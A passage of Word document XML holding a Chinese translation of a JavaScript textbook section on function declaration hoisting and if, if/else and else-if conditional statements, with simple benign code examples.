    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function facto</w:t>
      </w:r>
      <w:r>
        <w:t>rial(n){//</w:t>
      </w:r>
      <w:r>
        <w:t>一个递归函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(n</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>=1)return 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return n*factorial(n-1);</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函数声明语句通常出现在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码的最顶层，也可以嵌套在其他函数体内。但在嵌套时，函数声明只能出现在所嵌套函数的顶部。也就是说，函数定义不能出现在</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>语句、</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>循环或其他任何语句中，正是由于函数声明位置的这种限制，</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>标准规范并没有将函数声明归类为真正的语句。有一些</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>实现的确允许在出现语句的地方都可以进行函数声明，但是不同的实现在细</w:t>
      </w:r>
      <w:r>
        <w:t>节处理方式上有很大差别，因此将函数声明放在其他的语句内的做法并不具备可移植性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>尽管函数声明语句和函数定义表达式包含相同的函数名，但二者仍然不同。两种方式都创建了新的函数对象，但函数声明语句中</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>的函数名是一个变量名，变量指向函数对象。和通过</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>声明变量一样，函数定义语句中的函数被显式地</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>提前</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>到了脚本或函数的顶部。因此它们在整个脚本和函数内都是可见的。使用</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>的话，只有变量声明提前了</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>变量的初始化代码仍然在原来的位置。然而使用函数声明语句的话，函数名称和函数体均提前：脚本中的所有函数和函数中所有嵌套的函</w:t>
      </w:r>
      <w:r>
        <w:t>数都会在当前上下文中其他代码之前声明。也就是说，可以在声明一个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数之前调用它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:r>
        <w:t>语句一样，函数声明语句创建的变量也是无法删除的。但是这些变量不是只读的，变量值可以重写。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="5_4_Tiao_Jian_Yu_Ju_"/>
      <w:r>
        <w:t>5.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　条件语句</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>条件语句是通过判断指定表达式的值来决定执行还是跳过某些语句。这些语句是代码的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>决策点</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，有时称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>分支</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。如果说</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器是按照代码的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>路径</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>执行的，条件语句就是这条路径上的分叉点，程序执行到这里时必须选择其中一条路径继续执行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>下面几节将会讲述</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中基本的条件语句，如</w:t>
      </w:r>
      <w:r>
        <w:t>if/else</w:t>
      </w:r>
      <w:r>
        <w:t>语句和</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句，</w:t>
      </w:r>
      <w:r>
        <w:t>switch</w:t>
      </w:r>
      <w:r>
        <w:t>语句是一种更复杂的多分支条件语句。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="5_4_1_if"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>5.4.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:bookmarkEnd w:id="114"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>语句是一种基本的控制语句，它让</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>程序可以选择执行路径，更准确地说，就是有条件地执行语句，这种语句有两种形式，第一种是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(expression)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>statement</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在这种形式中，需要计算</w:t>
      </w:r>
      <w:r>
        <w:t>expression</w:t>
      </w:r>
      <w:r>
        <w:t>的值，如果计算结果是真值，那么就执行</w:t>
      </w:r>
      <w:r>
        <w:t>statement</w:t>
      </w:r>
      <w:r>
        <w:t>。如果</w:t>
      </w:r>
      <w:r>
        <w:t>expression</w:t>
      </w:r>
      <w:r>
        <w:t>的值是假值，那么就不执行</w:t>
      </w:r>
      <w:r>
        <w:t>state</w:t>
      </w:r>
      <w:r>
        <w:t>ment</w:t>
      </w:r>
      <w:r>
        <w:t>。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(username==null)//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>username="John Doe";//</w:t>
      </w:r>
      <w:r>
        <w:t>对其进行定义</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>同样地：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>，那么给它赋一个新值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!username)username="John Doe";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>需要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>语句中括住</w:t>
      </w:r>
      <w:r>
        <w:t>expression</w:t>
      </w:r>
      <w:r>
        <w:t>的圆括号在语法上是必需的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语法规定，</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>关键字和带圆括号的表达式之后必须跟随一条语句，但可以使用语句块将多条语句合并成一条。因此，</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>语句的形式如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!address){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>address="";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>message="Please specify a mailing address.";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if</w:t>
      </w:r>
      <w:r>
        <w:t>语句的第二种形式引入了</w:t>
      </w:r>
      <w:r>
        <w:t>else</w:t>
      </w:r>
      <w:r>
        <w:t>从句，当</w:t>
      </w:r>
      <w:r>
        <w:t>expression</w:t>
      </w:r>
      <w:r>
        <w:t>的值是</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>的时候执行</w:t>
      </w:r>
      <w:r>
        <w:t>else</w:t>
      </w:r>
      <w:r>
        <w:t>中的逻辑。其语法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(expression)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>statement1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>statement2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在这</w:t>
      </w:r>
      <w:r>
        <w:t>段代码中，当</w:t>
      </w:r>
      <w:r>
        <w:t>expression</w:t>
      </w:r>
      <w:r>
        <w:t>为真值时执行</w:t>
      </w:r>
      <w:r>
        <w:t>statement1</w:t>
      </w:r>
      <w:r>
        <w:t>，当</w:t>
      </w:r>
      <w:r>
        <w:t>expression</w:t>
      </w:r>
      <w:r>
        <w:t>为假值时执行</w:t>
      </w:r>
      <w:r>
        <w:t>statement2</w:t>
      </w:r>
      <w:r>
        <w:t>，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(n==1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log("You have 1 new message.");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log("You have"+n+"new messages.");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当在</w:t>
      </w:r>
      <w:r>
        <w:t>if/else</w:t>
      </w:r>
      <w:r>
        <w:t>语句中嵌套使用</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>语句时，必须注意确保</w:t>
      </w:r>
      <w:r>
        <w:t>else</w:t>
      </w:r>
      <w:r>
        <w:t>语句匹配正确的</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>语句。考虑如下代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>i=j=1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>k=2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(i==j)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(j==k)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log("i equals k");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log("i doesn't equal j");//</w:t>
      </w:r>
      <w:r>
        <w:t>错误</w:t>
      </w:r>
      <w:r>
        <w:t>!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在这个示例中，内层</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>语句构成了外层</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>语句所需要的子句。但是，</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>else</w:t>
      </w:r>
      <w:r>
        <w:t>的匹配关系并不清晰（只有缩进给出了一些暗示），而且在这个例子中，缩进给出的暗示是错误的，因为</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器将上述代码实际解释为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(i==j){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(j==k)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log("i equals k");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log("i doesn'</w:t>
      </w:r>
      <w:r>
        <w:t>t equal j");//</w:t>
      </w:r>
      <w:r>
        <w:t>错误！</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和大多数编程语言一样，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>else</w:t>
      </w:r>
      <w:r>
        <w:t>匹配规则是，</w:t>
      </w:r>
      <w:r>
        <w:t>else</w:t>
      </w:r>
      <w:r>
        <w:t>总是和就近的</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>语句匹配。为了让这个例子可读性更强、更易理解、更方便维护和调试，应当适当地使用花括号：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(i==j){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(j==k){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log("i equals k");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>花括号让代码结构更加清晰</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>console.log("i doesn't equal j");</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虽然这并不是本书中所使用的编码风格，但许多程序员都有将</w:t>
      </w:r>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>else</w:t>
      </w:r>
      <w:r>
        <w:t>语句主体用花括号括起来的习惯（就像在类似</w:t>
      </w:r>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:t>循环这样的复合语句中一样），即便每条分支只有一条语句，但坚持这样做可以避免刚才这种程序歧义的问题。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="115" w:name="5_4_2_else_if"/>
      <w:r>
        <w:t>5.4.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>else if</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>if/else</w:t>
      </w:r>
      <w:r>
        <w:t>语句通过判断一个表达式的计算结果来选择执行两条分支中的一条。但当代码中有多条分支的时候该怎么办呢？一种解决办法是使用</w:t>
      </w:r>
      <w:r>
        <w:t>else if</w:t>
      </w:r>
      <w:r>
        <w:t>语句。</w:t>
      </w:r>
      <w:r>
        <w:t>else if</w:t>
      </w:r>
      <w:r>
        <w:t>语句并不是真正的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>语句，它只不过是多条</w:t>
      </w:r>
      <w:r>
        <w:t>if/else</w:t>
      </w:r>
      <w:r>
        <w:t>语句连在一起时的一种惯用写法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(n==1){//</w:t>
      </w:r>
      <w:r>
        <w:t>执行代码块</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(n==2){//</w:t>
      </w:r>
      <w:r>
        <w:t>执行代码块</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(n==3){//</w:t>
      </w:r>
      <w:r>
        <w:t>执行代码块</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
